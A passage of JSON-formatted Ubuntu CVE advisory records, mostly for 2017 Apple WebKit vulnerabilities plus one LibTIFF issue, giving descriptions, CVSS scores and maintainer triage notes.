"cvss2": {"severity": 
"MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9643"], "modified": "2017-03-07T00:00:00", "id": "UB:CVE-2016-9643", "href": "https://ubuntu.com/security/CVE-2016-9643", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-04T14:03:15", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is\naffected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The\nissue involves the \"WebKit\" component. It allows remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. 
For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-01T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2396", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2396"], "modified": "2017-04-01T00:00:00", "id": "UB:CVE-2017-2396", "href": "https://ubuntu.com/security/CVE-2017-2396", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:03:15", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is\naffected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The\nissue involves the \"WebKit\" component. It allows remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. 
For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-01T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2395", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2395"], "modified": "2017-04-01T00:00:00", "id": "UB:CVE-2017-2395", "href": "https://ubuntu.com/security/CVE-2017-2395", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:03:11", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is\naffected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The\nissue involves the \"WebKit\" component. It allows remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. 
For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-01T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2476", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2476"], "modified": "2017-04-01T00:00:00", "id": "UB:CVE-2017-2476", "href": "https://ubuntu.com/security/CVE-2017-2476", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:03:12", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is\naffected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The\nissue involves the \"WebKit\" component. It allows remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. 
For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-01T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2468", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2468"], "modified": "2017-04-01T00:00:00", "id": "UB:CVE-2017-2468", "href": "https://ubuntu.com/security/CVE-2017-2468", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:08:38", "description": "The DumpModeEncode function in tif_dumpmode.c in the bmp2tiff tool in\nLibTIFF 4.0.6 and earlier, when the \"-c none\" option is used, allows remote\nattackers to cause a denial of service (buffer over-read) via a crafted BMP\nimage.\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=820362>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[sbeattie](<https://launchpad.net/~sbeattie>) | out of bounds read \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | upstream removed the bmp2tiff utility in 4.0.7 we will not be fixing this minor issue, marking as ignored\n", "cvss3": 
{"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2016-10-03T00:00:00", "type": "ubuntucve", "title": "CVE-2016-3619", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3619"], "modified": "2016-10-03T00:00:00", "id": "UB:CVE-2016-3619", "href": "https://ubuntu.com/security/CVE-2016-3619", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-04T14:03:10", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is\naffected. Safari before 10.1 is affected. iCloud before 6.2 on Windows is\naffected. iTunes before 12.6 on Windows is affected. tvOS before 10.2 is\naffected. The issue involves the \"WebKit\" component. It allows remote\nattackers to bypass the Same Origin Policy and obtain sensitive information\nvia a crafted web site.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. 
For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-04-02T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2480", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2480"], "modified": "2017-04-02T00:00:00", "id": "UB:CVE-2017-2480", "href": "https://ubuntu.com/security/CVE-2017-2480", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-04T14:03:11", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is\naffected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The\nissue involves the \"WebKit\" component. It allows remote attackers to\nconduct Universal XSS (UXSS) attacks via crafted use of frames on a web\nsite.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. 
For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2017-04-01T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2475", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2475"], "modified": "2017-04-01T00:00:00", "id": "UB:CVE-2017-2475", "href": "https://ubuntu.com/security/CVE-2017-2475", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-08-04T14:03:15", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is\naffected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The\nissue involves the \"WebKit\" component. It allows remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. 
For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-01T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2394", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2394"], "modified": "2017-04-01T00:00:00", "id": "UB:CVE-2017-2394", "href": "https://ubuntu.com/security/CVE-2017-2394", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:03:09", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is\naffected. macOS before 10.12.4 is affected. tvOS before 10.2 is affected.\nwatchOS before 3.2 is affected. The issue involves nghttp2 before 1.17.0 in\nthe \"HTTPProtocol\" component. 
It allows remote HTTP/2 servers to have an\nunspecified impact via unknown vectors.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | no details, likely apple-specific CVE, marking as not-affected\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-04-02T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2428", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2428"], "modified": "2017-04-02T00:00:00", "id": "UB:CVE-2017-2428", "href": "https://ubuntu.com/security/CVE-2017-2428", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:03:16", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is\naffected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The\nissue involves the \"WebKit\" component. It allows remote attackers to bypass\nthe Same Origin Policy and obtain sensitive information via a crafted web\nsite.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. 
For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-04-01T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2367", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2367"], "modified": "2017-04-01T00:00:00", "id": "UB:CVE-2017-2367", "href": "https://ubuntu.com/security/CVE-2017-2367", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-04T14:03:13", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is\naffected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The\nissue involves the \"WebKit\" component. It allows remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. 
For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-01T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2454", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2454"], "modified": "2017-04-01T00:00:00", "id": "UB:CVE-2017-2454", "href": "https://ubuntu.com/security/CVE-2017-2454", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:03:13", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is\naffected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The\nissue involves the \"WebKit\" component. It allows remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. 
For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-01T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2460", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2460"], "modified": "2017-04-01T00:00:00", "id": "UB:CVE-2017-2460", "href": "https://ubuntu.com/security/CVE-2017-2460", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:03:10", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is\naffected. Safari before 10.1 is affected. iCloud before 6.2 on Windows is\naffected. iTunes before 12.6 on Windows is affected. tvOS before 10.2 is\naffected. The issue involves the \"WebKit\" component. It allows remote\nattackers to bypass the Same Origin Policy and obtain sensitive information\nvia a crafted web site.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. 
For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-04-02T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2479", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2479"], "modified": "2017-04-02T00:00:00", "id": "UB:CVE-2017-2479", "href": "https://ubuntu.com/security/CVE-2017-2479", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-04T14:03:15", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is\naffected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The\nissue involves the \"WebKit\" component. It allows remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. 
For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-01T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2466", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2466"], "modified": "2017-04-01T00:00:00", "id": "UB:CVE-2017-2466", "href": "https://ubuntu.com/security/CVE-2017-2466", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:03:11", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is\naffected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The\nissue involves the \"WebKit\" component. It allows remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. 
For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-01T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2481", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2481"], "modified": "2017-04-01T00:00:00", "id": "UB:CVE-2017-2481", "href": "https://ubuntu.com/security/CVE-2017-2481", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:03:12", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is\naffected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The\nissue involves the \"WebKit\" component. It allows remote attackers to\nexecute arbitrary code or cause a denial of service 